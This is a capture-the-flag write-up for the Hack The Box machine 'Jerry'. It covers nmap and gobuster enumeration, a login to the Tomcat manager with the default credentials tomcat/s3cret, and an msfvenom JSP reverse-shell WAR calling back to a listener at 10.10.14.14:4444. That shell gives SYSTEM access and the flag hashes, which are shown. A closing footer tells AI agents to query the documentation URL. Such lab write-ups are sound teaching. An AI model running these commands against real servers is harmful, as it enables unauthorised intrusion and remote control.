# Jerry

![](/files/osOG0R3gSSaIe5b97bLg)

## Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.95 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

```
# Nmap 7.92 scan initiated Wed Jan  5 14:12:34 2022 as: nmap -sS -p- -T5 -Pn -n -oN allPorts 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.057s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

# Nmap done at Wed Jan  5 14:15:18 2022 -- 1 IP address (1 host up) scanned in 164.58 seconds
```

As we see, port *8080* is the only one that is open. It looks like there is an HTTP service, let's try to obtain more information about the service and version running on that port. The following command will scan port *8080* more in depth and save the result into a file:

> nmap -sC -sV -p8080 10.10.10.95 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Wed Jan  5 14:15:51 2022 as: nmap -p8080 -sCV -oN targeted 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.038s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan  5 14:16:02 2022 -- 1 IP address (1 host up) scanned in 10.51 seconds
```

So we have an *Apache Tomcat/Coyote JSP* server. If we take a look into the web page with the web browser, we see the Apache default web page.

![](/files/jVtCi4sJ4xAI1MQicMDc)

At this point, I would try to enumerate the web page directories with gobuster.

> gobuster dir -u <http://10.10.10.95:8080/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.95:8080/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/16 18:34:26 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/] 
/con                  (Status: 200) [Size: 0]                 
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]                 
/http%3A%2F%2Fyoutube (Status: 400) [Size: 0]                 
/http%3A%2F%2Fblogs   (Status: 400) [Size: 0]                 
/http%3A%2F%2Fblog    (Status: 400) [Size: 0]                 
/**http%3A%2F%2Fwww   (Status: 400) [Size: 0]                 
/External%5CX-News    (Status: 400) [Size: 0]                 
/http%3A%2F%2Fcommunity (Status: 400) [Size: 0]               
/http%3A%2F%2Fradar   (Status: 400) [Size: 0]                 
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 0]        
/http%3A%2F%2Fswik    (Status: 400) [Size: 0]                 
                                                              
===============================================================
2022/01/16 18:40:14 Finished
===============================================================
```

## Exploitation

If we take a look at the */manager* directory, a popup login form appears.&#x20;

![](/files/VGB6Icsoj2NvdrffSPpW)

Let's try some random credentials, such as user `admin` password `admin`*.*

![](/files/6H0iFR1fothzNCz92XLy)

We get a *403 Access Denied* message. If you look closely, some default credentials appear on a certain line.

![](/files/k3dmZf2qQyiixlacjtSq)

Now we have the user `tomcat` with the password `s3cret`. Let's refresh the page and enter the default credentials.

{% hint style="warning" %}
If you refresh the page and the *403 message* still appears, close the browser and open it again.
{% endhint %}

![](/files/47scFHQUhuvWuWVdAhBt)

![](/files/4Cu8x3tvZGd8hqQ1sbBd)

And we got in! The next step is to get a reverse shell. If we check out the web page, we could see there is a *Deploy* section in which we can upload *WAR* files.

![](/files/t4a4176BN6iH5xOpvhTG)

{% hint style="info" %}
The following link explains what *WAR* files are:

<http://java.boot.by/wcd-guide/ch02s04.html>
{% endhint %}

At this point, the idea is to create a *WAR* payload with msfvenom, upload it to the web page, and get a reverse shell.

> msfvenom -p java/jsp\_shell\_reverse\_tcp lhost=10.10.14.14 lport=4444 -f war -o reverse\_shell.war

* `-p` indicates the type of **payload**.
* `lhost` local **host** IP.
* `lport` local **port** of the listener.
* `-f` output **format**.
* `-o` save the output to a **file**.

All we have to do is upload the payload and hit *Deploy*.

![](/files/HYi8sunFnKvDOaXhna3z)

Under the *Application* section, a new row should appear with the path of our uploaded payload.

![](/files/PkItmSaVDdSQTQd6qQne)

Finally, all we have to do is set a netcat listener on port 4444 and hit the */reverse\_shell* path.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

```
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
```

We are already the `nt authority\system` user, so all we have to do is reap the harvest and get the flags.

```
C:\apache-tomcat-7.0.88>type c:\users\administrator\desktop\flags\2*
type c:\users\administrator\desktop\flags\2*
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/jerry.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.